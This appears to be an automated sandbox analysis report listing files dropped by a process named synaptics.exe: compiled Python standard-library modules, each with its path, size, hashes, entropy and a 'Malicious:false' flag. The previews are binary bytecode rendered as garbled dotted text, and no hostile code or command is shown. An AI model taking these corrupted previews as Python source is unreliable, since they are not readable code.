                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.g.d...Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.e.e.f.d.d...Z.e.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d.d...Z.e.f.d d!..Z.e.f.d"d#..Z.e.f.d$d%..Z.d&e.f.d'e.f.d(e.f.g.d(e.f.d)e.f.d&e.f.g.d)e.f.d(e.f.d'e.f.g.d'e.f.d&e.f.d)e.f.g.d*..Z.d+d,..Z.d-d...Z.z.d.d/l m.Z...W.n...e!y.......Y.n.w.e"..Z#e#f.d0d1..Z$z.d.d2l m$Z$..W.n...e!y.......Y.n.w.G.d3d4..d4..Z%z.d.d5l m%Z%..W.n...e!y.......Y.n.w.G.d6d7..d7e"..Z&d8d9..Z'e.d:g.d;....Z(G.d<d=..d=e)..Z*e"..f.e+e,h.e-e.e/f.d>d?..Z0dXdBdC..Z1dDdE..Z2z.d.dFl m2Z2..W.n...e!..y;......Y.n.w.dGdH..Z3dIdJ..Z4dYdLdM..Z5dNdO..Z6dPdQ..Z7dRdS..Z8G.dTdU..dU..Z9e"..Z:G.dVdW..dW..Z;dKS.)ZzEfunctools.py - Tools for working with functions and callable objects.)...update_wrapper..wraps..WRAPPER_ASSIGNMENTS..WRAPPER_UPDATES..total_ordering..cache..cmp_to_key..lru_cache..reduce..partial..partialmethod..singledispatch..si
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3931
                                                                                                                                                                                                            Entropy (8bit):5.176077173194853
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:NqsfAs4EvMosntVf4/zsSQ1ow+2U/tAaDKDj51dmvuoZ:2s43tKyow8/tjgqWoZ
                                                                                                                                                                                                            MD5:F25127311E03924151ED55C0BE5550AB
                                                                                                                                                                                                            SHA1:6376F1D8E27584C7F6BBC175A7949822567FED8B
                                                                                                                                                                                                            SHA-256:76DA4928AB57D20A0B924D3137C426D68B4BC8D69D1E2AFABB869474E9A7D086
                                                                                                                                                                                                            SHA-512:27C6BB2A0040DC0DBF0F18F880113A749FCD89818F5D2668E29569A700252A1EEC6631F1257558AEAF838D5A54F6D19AFCB389CAB63525B1671636BF5CFC5D30
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.).z..Path operations common to more than one OS.Do not use directly. The OS specific modules import the appropriate.functions from this module themselves.......N)...commonprefix..exists..getatime..getctime..getmtime..getsize..isdir..isfile..samefile..sameopenfile..samestatc....................C...s*...z.t...|.....W.d.S...t.t.f.y.......Y.d.S.w.).zDTest whether a path exists. Returns False for broken symbolic linksFT)...os..stat..OSError..ValueError)...path..r.....:C:\Users\user\AppData\Local\xFSOj9El1Q\lib\genericpath.pyr........s................r....c....................C....4...z.t...|...}.W.n...t.t.f.y.......Y.d.S.w.t...|.j...S.).z%Test whether a path is a regular fileF).r....r....r....r......S_ISREG..st_mode).r......str....r....r....r.........................r....c....................C...r....).z<Retu
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):5876
                                                                                                                                                                                                            Entropy (8bit):5.144848461998511
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:477f2UQQ4yZsw+LQ4yZs9UfK9BCjbAOp280dqZqh3qX0GqQC7xr8HqRRqhBQoSqj:nXQ7ZMLQ7Z6UC7CjbrpteqZqBqX1qQCW
                                                                                                                                                                                                            MD5:257C3CC56F62969AAA6D6FB25602A56B
                                                                                                                                                                                                            SHA1:7CBA6C90AAC72E761F832C0836EFE9B8E518C0FC
                                                                                                                                                                                                            SHA-256:2EC176004857A754E0F8B970D0C36A5C1144A51E4242BB2B7697B011F7748E38
                                                                                                                                                                                                            SHA-512:00CE07F490D80FA807AD3695765D152AF4787008219B7F78ADFBC5B341B88FBD8087EE3F25D716305FA405354B7A4D73D5C92593574748AC4C0EC367CE24BCC2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.d.d.d.d...d.d...Z.d.d.d.d...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d d!..Z.e...d"..Z.e...d#..Z.d$d%..Z.d&d'..Z.d(d)..Z.d*d+..Z.e.j.e.e.d,d...B.Z d.S.)-z.Filename globbing utility......N)...glob..iglob..escapeF....root_dir..dir_fd..recursivec....................C...s....t.t.|.|.|.|.d.....S.).ay...Return a list of paths matching a pathname pattern... The pattern may contain simple shell-style wildcards a la. fnmatch. However, unlike fnmatch, filenames starting with a. dot are special cases that are not matched by '*' and '?'. patterns... If recursive is true, the pattern '**' will match any files and. zero or more directories and subdirectories.. r....)...listr....)...pathnamer....r....r......r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\glob.pyr........s......r....c....................C...s...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6869
                                                                                                                                                                                                            Entropy (8bit):5.601834586762614
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:jdPjhwzUgQUdROKh0WXI7dQia/ix6s6ct6iojyyt8NQCcx54bNdO9DF4irm/NMlu:jRmE5+odQiaKxJ6ctv4OmVP/4X2J4hg0
                                                                                                                                                                                                            MD5:E8CFFA13A217E490F8FBFAF9BEB9A147
                                                                                                                                                                                                            SHA1:8946BBDFE35CAEC42CAECB3D3B7587F0C3148F01
                                                                                                                                                                                                            SHA-256:65AA2C7A75450AD3092F145549337CC981DF2F1FCCE2D5EFAEFFE9A135C6F39F
                                                                                                                                                                                                            SHA-512:3BB95BA9F6190B10574240275931B2BEAB2FD5DD7EA093395DAB2F0FC834F97756EC1C405DEAF727597F53FA813F56B9229C072A8BA9E5A07D2CF2E49AE87804
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.).......................@...sl...d.Z.d.Z.e.e...Z.e.e...Z.e.d...Z.i.Z.d.d.h.Z.d.d...Z.d.d...Z.d.d.d...Z.d.d.d...Z.z.d.d.l.Z.e.Z.e.Z.e...e.j...Z.W.n...e.yG......d.Z.e.Z.e.Z.Y.n.w.z.d.d.l.m.Z...W.n*..e.yz......d.d.l.m.Z...e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.d.d...Z.Y.n.w.z.d.d.l.m.Z...W.n...e.y.......Y.n.w.e.D.].Z.z.e.e...e...e.<.W.q...e.y.......d.d.l.Z.e...d.e.....Y.q.w.[.[.[.[.[.[.d.S.).a3...hashlib module - A common interface to many hash functions...new(name, data=b'', **kwargs) - returns a new hash object implementing the. given hash function; initializing the hash. using the given binary data...Named constructor functions are also available, these are faster.than using new(name):..md5(), sha1(), sha224(), sha256(), sha384(), sha512(), blake2b(), blake2s(),.sha3_224, sha3_256, sha3_384, sha3_512, shake_128, and shake_256...More algorithms may be available on your platform but the above are guaranteed
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):13889
                                                                                                                                                                                                            Entropy (8bit):5.355589884204414
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:lnqTYZnQtot7ItafyjjWya/PX7FGRxibJWiTqe0hN2leov+Ugn:lnEYZn0ot7It7j3aX7gRxiM0uN2kk+/n
                                                                                                                                                                                                            MD5:0EE4EE04D9110E62FC27A7DAD6DED74D
                                                                                                                                                                                                            SHA1:D29A5089AC52594BD0EDFBAE4575645EB803B744
                                                                                                                                                                                                            SHA-256:CE943BCE1341CF70BB280035CD41639C71FB1D378812406BFA912D7B1878C411
                                                                                                                                                                                                            SHA-512:EADE22E94F6DACF3A6C6CF1E27996C29AC90B3375660E289FAE903772E25630F37601132FEA0E81EF5611599EC8C8FFCB35EE001BA0FEA66BC4F43C466CD7EB0
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.[.......................@...sD...d.Z.d.Z.g.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d.d...d.d...Z.d*d d!..Z.d*d"d#..Z.z.d$d%l.T.W.n...e.yY......Y.n.w.z.d$d&l.m.Z...W.n...e.yk......Y.n.w.z.d$d'l.m.Z...W.n...e.y}......Y.n.w.z.d$d(l.m.Z...W.n...e.y.......Y.n.w.e.d)k.r.d$d.l.Z.e.e.........d.S.d.S.)+a....Heap queue algorithm (a.k.a. priority queue)...Heaps are arrays for which a[k] <= a[2*k+1] and a[k] <= a[2*k+2] for.all k, counting elements from 0. For the sake of comparison,.non-existing elements are considered to be infinite. The interesting.property of a heap is that a[0] is always its smallest element...Usage:..heap = [] # creates an empty heap.heappush(heap, item) # pushes a new item on the heap.item = heappop(heap) # pops the smallest item from the heap.item = heap[0] # smallest item on the heap without popping it.heapify(x) # transforms list into a heap, in-place, in linear time
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):6997
                                                                                                                                                                                                            Entropy (8bit):5.300873797426216
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:oQFTSdeLSo3yfjb/3xXrCx5PgT1nxc203AbC:oQFT0eLhyX1K5S1nv0QbC
                                                                                                                                                                                                            MD5:5A8D4CEBAF7B9321BF5DB3539EA6851F
                                                                                                                                                                                                            SHA1:669BB4DF38628079FBD22385314DEDF763701BA4
                                                                                                                                                                                                            SHA-256:8F25E2631224367DABD2AC186DD599ED439903E147A9D3A7A0D71D9775A7CDAD
                                                                                                                                                                                                            SHA-512:6CD623A08BCBD549C7530738D3289E8FD09AA26DA15E954C2BBA82F2124A0C0923B2AF1DD5B0018FA162C01A9DE6B8714637A0D44FBD0DE1CEB0A2281F2791D8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.d.l.Z.z.d.d.l.Z.W.n...e.y.......d.Z.d.Z.d.d.l.m.Z...Y.n.w.e.j.Z.e.e.j...Z.d.d.l.Z.e.d.d...e.d...D.....Z.e.d.d...e.d...D.....Z.d.Z.G.d.d...d...Z.d.d.d...Z.d.d...Z.d.S.).zqHMAC (Keyed-Hashing for Message Authentication) module...Implements the HMAC algorithm as described by RFC 2104.......N)..._compare_digestc....................c..........|.].}.|.d.A.V...q.d.S.)..\...N.......0..xr....r.....3C:\Users\user\AppData\Local\xFSOj9El1Q\lib\hmac.py..<genexpr>.............r.........c....................c...r....)..6...Nr....r....r....r....r....r........r....c....................@...sf...e.Z.d.Z.d.Z.d.Z.d.Z.d.d.d...Z.d.d...Z.d.d...Z.e.d.d.....Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...HMACz~RFC 2104 HMAC class. Also complies with RFC 4231... This supports the API for Cryptographic Hash Functions (PEP 247).. .@...)..._hmac.._inner.._outer..block_size..digest_sizeN..c....................C...s....t.|.t.t.f...s.t.d.t.|...j.......|.s.t
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):85177
                                                                                                                                                                                                            Entropy (8bit):5.490205873412749
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:LRc0NzW1X0tJcqYqOWjXHdV352ox842jTk9VBbL+xSjiN2TjJXTpsWTp5JQVXiG0:LRvtW1o737HdV35KNPKmwHtQVSG82IQk
                                                                                                                                                                                                            MD5:D5EBA16E217EC03779A2894CC62EB0AA
                                                                                                                                                                                                            SHA1:1A2AB2972E7F96A21F29306A5DB9AD4C13D9B988
                                                                                                                                                                                                            SHA-256:E7894CC12F7E5E3C90681E0CE07C7FBCCA0A598E0CEC8FC4E34FB1B489A15DB1
                                                                                                                                                                                                            SHA-512:CFAF0B7BE7298114FC899554FCF0BB4CEAE5FFB8E6BDE76CD53444273583ADECBBADAC40B57728E0AA96C11DD6934643EC80FE3B4C8691AB9417F0583F889C6E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...s....d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...e...Z.e.j.....D.].\.Z.Z.e.e.d.e...<.q^d.Z.d.d.d.d...d.d...Z d.d...Z!d.d...Z"d.d...Z#d.d...Z$d.d...Z%e&e.d...r.d.d...Z'n.d.d...Z'e&e.d...r.d.d...Z(n.d.d...Z(d.d...Z)d d!..Z*d"d#..Z+d$d%..Z,d&d'..Z-d(d)..Z.d*d+..Z/d,d-..Z0d.d/..Z1d0d1..Z2d2d3..Z3d4d5..Z4d6d7..Z5d8d9..Z6d:d;..Z7d.d<d=..Z8e.d>d?..Z9d@dA..Z:dBdC..Z;d.dD..dEdF..Z<dGdH..Z=dIdJ..Z>dKdL..Z?dMdN..Z@dOdP..ZAdQdR..ZBdSdT..ZCdUdV..ZDd.dWdX..ZEi.ZFi.ZGd.dYdZ..ZHG.d[d\..d\eI..ZJG.d]d^..d^e.jK..ZLd_d`..ZMdadb..ZNG.dcdd..ddeI..ZOG.dedf..df..ZPdgdh..ZQdidj..ZRdkdl..ZSdmdn..ZTd.dodp..ZUe.dqdr..ZVdsdt..ZWe.dudv..ZXdwdx..ZYe.dydz..ZZd{d|..Z[e.d}d~..Z\d.d...Z]d.d.d...Z^d.d...Z_d.d.d.d.i.i.e`d.d...d.d...d.d...d.d...e^f.d.d...Zae`d.d...d.d...d.d...f.d.d...Zbd.d...Zcd.d...Zdd.d...Zee.d.d...Zfd.d...Zge.d.d...Zhd.d.d...Zid.d...Zje.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):3687
                                                                                                                                                                                                            Entropy (8bit):5.398638238986771
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:48:l4jeBVAsKEv1YlurRNZsmi/VA61vWF/3+XIQjC2Ai3QuAXuhgwGBQPOcGcMzzMfM:GUK0iSxOmoWF2vLAy/hyKP7GcmYa7RXn
                                                                                                                                                                                                            MD5:852AD2AF8B4AA6D5DA4AE89EAE320507
                                                                                                                                                                                                            SHA1:D8452AC9A94FC5964B9DC6E86611530F68B36937
                                                                                                                                                                                                            SHA-256:3A236A31CFF7F8A4D5035006229E2492F7F8B41B190979490A3B09EFDB83AF01
                                                                                                                                                                                                            SHA-512:BB3A9B6E5129A7512B1624725834C523409E7A8C8C891A46B16BFC588112F2F572CD0031220FBA9E9383263207AD0D88A70BB855FFD18212989D7A0C817183C3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sH...d.Z.d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d...Z.d.e._.d.Z.d.Z.d.Z.G.d.d...d.e.j.e.j.d...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j.e...Z.G.d.d...d.e.j e...Z!e.."e.....e.e.e.e.e.f.D.].Z#e.."e#....que.e.f.D.].Z#e!."e#....q.[#z.d.d.l.m$Z$..W.n...e%y.......Y.d.S.w.e.."e$....d.S.).a....The io module provides the Python interfaces to stream handling. The.builtin open function is defined in this module...At the top of the I/O hierarchy is the abstract base class IOBase. It.defines the basic interface to a stream. Note, however, that there is no.separation between reading and writing to streams; implementations are.allowed to raise an OSError if they do not support a given operation...Extending IOBase is RawIOBase which deals simply with the reading and.writing of raw bytes to a stream. FileIO subclasses RawIOBase to provide.an interface to OS files...BufferedIOBase deals with buffering on a raw
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):61475
                                                                                                                                                                                                            Entropy (8bit):5.306757684534711
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:1536:shqqs3deqQmjuqJqq9qhIOGqaqzIVqOq/sqmqeXWqJqZqoqfqEqNqqBNqzSq2qfe:1amjPaWNFGc81veYm1o4Jg5wLlf8x7LR
                                                                                                                                                                                                            MD5:789DFF134DBAF255729CD45DF2989A42
                                                                                                                                                                                                            SHA1:D2CEC311CD7F852853DE192E28C28458478627C0
                                                                                                                                                                                                            SHA-256:44591C94AE909F9BEE955B6439FBA7674524B5EA7412B430AEB3E8D0DC9A3E75
                                                                                                                                                                                                            SHA-512:4BC55DF337DA4876AE2B8373B5310C10C86937D9C78926470FD1149CB1E2817860B253A7CB1ABC171AB3F33B78C00CF08E413C638E9EDD7ECA51D5BD2C74D1C2
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.,.......................@...s....d.Z.d.Z.d.d.l.Z.d.Z.d.Z.G.d.d...d.e...Z.G.d.d...d.e...Z.d.d...Z.d=d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.d ..Z.d!d"..Z.G.d#d$..d$..Z.d.a.e.j.G.d%d&..d&e.....Z.e.j.G.d'd(..d(e.....Z.G.d)d*..d*..Z.G.d+d,..d,e.e...Z.G.d-d...d.e...Z.G.d/d0..d0e.e...Z.G.d1d2..d2..Z.e.e._.G.d3d4..d4..Z.G.d5d6..d6e.e...Z G.d7d8..d8e ..Z!G.d9d:..d:e.e...Z"G.d;d<..d<..Z#e#e _.d.S.)>z.A fast, lightweight IPv4/IPv6 manipulation library in Python...This library is used to create/poke/manipulate IPv4 and IPv6 addresses.and networks...z.1.0.....N. .......c....................@........e.Z.d.Z.d.Z.d.S.)...AddressValueErrorz%A Value Error related to the address.N....__name__..__module__..__qualname__..__doc__..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\ipaddress.pyr.................r....c....................@...r....)...NetmaskValueErrorz%A Value Error related to the netmask.Nr....r....r....r....r....r........r....r....c.....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):951
                                                                                                                                                                                                            Entropy (8bit):5.421954556518975
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:24:lMBMgKEVTSAvFwzVCI0L67avc0Kb4S0bJB6R/mfju:lMzVu8wzVmxcZt0bJB65aa
                                                                                                                                                                                                            MD5:125DE7413FCD8C6DE47A6CFE83A30EE0
                                                                                                                                                                                                            SHA1:5622C962BCB5AEDCD8BEFE9259A5ED30648F1A17
                                                                                                                                                                                                            SHA-256:DC1227E14459277DDC7F0B9C5445349B074864FFD63FD8DC3CC4D03470F57C17
                                                                                                                                                                                                            SHA-512:F496262BD7D2FF5B3EFEBDC587CE715DA60FAC6147728AD0D777DFF5E0A23275747C60B7CBE901996813634CE75B5C52E499CB4915F29806284EE32A8C82498F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dd........................@...s4...d.Z.g.d...Z.g.d...Z.g.d...Z.e.e...j.Z.e.e...j.Z.d.S.).a....Keywords (from "Grammar/python.gram")..This file is automatically generated; please don't muck it up!..To update the symbols in this file, 'cd' to the top directory of.the python source tree and run:.. PYTHONPATH=Tools/peg_generator python3 -m pegen.keywordgen Grammar/python.gram Grammar/Tokens Lib/keyword.py..Alternatively, you can run 'make regen-keyword'..)...iskeyword..issoftkeyword..kwlist..softkwlist)#..False..None..TrueZ.andZ.asZ.assertZ.asyncZ.awaitZ.breakZ.classZ.continueZ.defZ.delZ.elifZ.elseZ.exceptZ.finallyZ.forZ.fromZ.globalZ.ifZ.import..inZ.is..lambdaZ.nonlocalZ.notZ.orZ.passZ.raise..returnZ.tryZ.whileZ.withZ.yield)..._Z.case..matchN)...__doc__..__all__r....r......frozenset..__contains__r....r......r....r.....6C:\Users\user\AppData\Local\xFSOj9El1Q\lib\keyword.py..<module>....s...........&....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4166
                                                                                                                                                                                                            Entropy (8bit):5.3288544448695925
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:nZ1Xjppmx0pYUG0wzU182J691Tc7mh5ae7y8:73yN10wzg6TTc7mh5vD
                                                                                                                                                                                                            MD5:5EA6ABB76B05D6228D1BE0EBE614612D
                                                                                                                                                                                                            SHA1:51D1206F5D26D08AC4AB5C6F0E6E039DAE07E4EA
                                                                                                                                                                                                            SHA-256:281F0691DD13CF139965CE30EE3EA57674AB3D8CC5A771982D33E0ED6C284311
                                                                                                                                                                                                            SHA-512:7B015F22CA5C8DAC1E670E5E486840C684119DA925F671F5EA1DF491C6C6ADDAB109F88430472566E6697ADAAAB09D6E26EC90F1619EC5E0F9112FB92411D605
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.........................@...sl...d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.g.d...Z.i.Z.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d.d...Z.d.d...Z.d.S.).z.Cache lines from Python source files...This is intended to read lines from modules imported -- hence if a filename.is not found, it will look down the module search path for a file by.that name.......N)...getline..clearcache..checkcache..lazycachec....................C...s....t.......d.S.).z.Clear the cache entirely.N)...cache..clear..r....r.....8C:\Users\user\AppData\Local\xFSOj9El1Q\lib\linecache.pyr........s......r....c....................C...s8...t.|.|...}.d.|.....k.r.t.|...k.r.n...d.S.|.|.d.....S.d.S.).z~Get a line for a Python source file from the cache.. Update the cache if it doesn't contain an entry for this file already........)...getlines..len)...filename..lineno..module_globals..linesr....r....r....r........s..............r....c....................C...sR...|.t.v.r.t.|...}.t.|...d.k.r.t.|...d...S.z.t.|.|...W.S...t.y
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):46189
                                                                                                                                                                                                            Entropy (8bit):6.062500819386345
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:768:r5YArctA0pztzQUB04zzRYKJFSd6tmm+a4L+P9cLjYp:l1YAGzbB04zVYAFU6x+a4aPuL8p
                                                                                                                                                                                                            MD5:FD0D37745902C070FCD8992C500F9C67
                                                                                                                                                                                                            SHA1:8A32C63DE06C049C9B6BE787D99CEA87C9045009
                                                                                                                                                                                                            SHA-256:04B38F745496A18A1B19CDCFDB013F05EF86747DFB753DE8581CC07F0C1F0633
                                                                                                                                                                                                            SHA-512:883ECEAABC2391991053E88B4844461EF766D333D45125FBB7939050F7E6504E4971945F89AFC3DA614BBF18D324564CD061DCC651F4280BB8742C5AB4BA448A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,d.8.......................@...sF"..d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.g.d...Z.d.d...Z.d.d...Z.z.d.d.l.T.W.n%..e.yW......d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.Z.d.d...Z...d.d.d...Z.Y.n.w.d.e...v.r_e.Z.d.e...v.rfe.Z.e.Z.i.Z.e.. e...d.d.....Z.d.d...Z!..d.d.d...Z"d.d...Z#e..$d...Z%..d.d d!..Z&..d.d"d#..Z'..d.d$d%..Z(..d.d&d'..Z)..d.d)d*..Z*d+d,..Z.d-d...Z+..d.d/d0..Z,e-f.d1d2..Z.d3d4..Z/d5d6..Z0e.Z1d7d8..Z2d9d:..Z3d;d<..Z4d=d>..Z5d?d@..Z6..d.dBdC..Z7e.f.dDdE..Z8..d.dFd...Z.e.f.dGdH..Z9z.d.dIl.m:Z:..W.n...e...y.......dJdK..Z:Y.n.w.z.e;..W.n...e<..y.........d.dLdM..Z=Y.n.w...d.dNdM..Z=i.dOdP..dQdP..dRdS..dTdU..dVdU..dWdX..dYdZ..d[d\..d]d^..d_d`..dadS..dbdc..ddde..dfdg..dhdS..didS..djdS..i.dkdl..dmdn..dodp..dqdr..dsdg..dtdu..dvdc..dwdx..dydz..d{de..d|d}..d~d...d.d...d.d...d.dU..d.d...d.d.....dXd.d.d.d.d.d.d\d^d`d.....Z>e?e>.@....D.].\.ZAZBeA.Cd.d...ZAe>.DeAeB......q.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):12124
                                                                                                                                                                                                            Entropy (8bit):5.378874754384823
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:m+KxmpkRLMC//oP1CHyszdKXnoGwKjwmAKa09hs4Nr:Wmo2CHtgNAKl9hs45
                                                                                                                                                                                                            MD5:50E59BF2FB36D9437AF8D76ADD84E9F5
                                                                                                                                                                                                            SHA1:33CD1A3DC2C95F023523759D4D1382986C2CF8F7
                                                                                                                                                                                                            SHA-256:469C398853129841649596D411B2FF6B1BE0E010E2507C702378CC7C0D50D45F
                                                                                                                                                                                                            SHA-512:F4E4EAC0770E2278EB00B57F5B22D1D6C274E151F80A708DE4EEFF6FE1FB8A6726F7F747426CD4D5DE7B9C24FD05CC089042BF477AF6521EE23E08ECB94B1F8A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:o.......Z.,dA5.......................@...s....d.Z.g.d...Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.T.d.d.l.m.Z.m.Z...d.d.l.Z.d.Z.d.Z.d.Z.G.d.d...d.e.j...Z.d.d.d.d.d.d.d.d.d...d.d...Z.e.d.d.d.f.d.d...Z.e.d.d.f.d.d...Z.d.S.).aS...Interface to the liblzma compression library...This module provides a class for reading and writing compressed files,.classes for incremental (de)compression, and convenience functions for.one-shot (de)compression...These classes and functions support both the XZ and legacy LZMA.container formats, as well as raw compressed data streams..)$Z.CHECK_NONEZ.CHECK_CRC32Z.CHECK_CRC64Z.CHECK_SHA256Z.CHECK_ID_MAXZ.CHECK_UNKNOWNZ.FILTER_LZMA1Z.FILTER_LZMA2Z.FILTER_DELTAZ.FILTER_X86Z.FILTER_IA64Z.FILTER_ARMZ.FILTER_ARMTHUMBZ.FILTER_POWERPCZ.FILTER_SPARC..FORMAT_AUTO..FORMAT_XZZ.FORMAT_ALONEZ.FORMAT_RAWZ.MF_HC3Z.MF_HC4Z.MF_BT2Z.MF_BT3Z.MF_BT4Z.MODE_FASTZ.MODE_NORMALZ.PRESET_DEFAULTZ.PRESET_EXTREME..LZMACompressor..LZMADecompressor..LZMAFile..LZMAError..open..compress..decompressZ.is_c
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\xFSOj9El1Q\synaptics.exe
                                                                                                                                                                                                            File Type:data
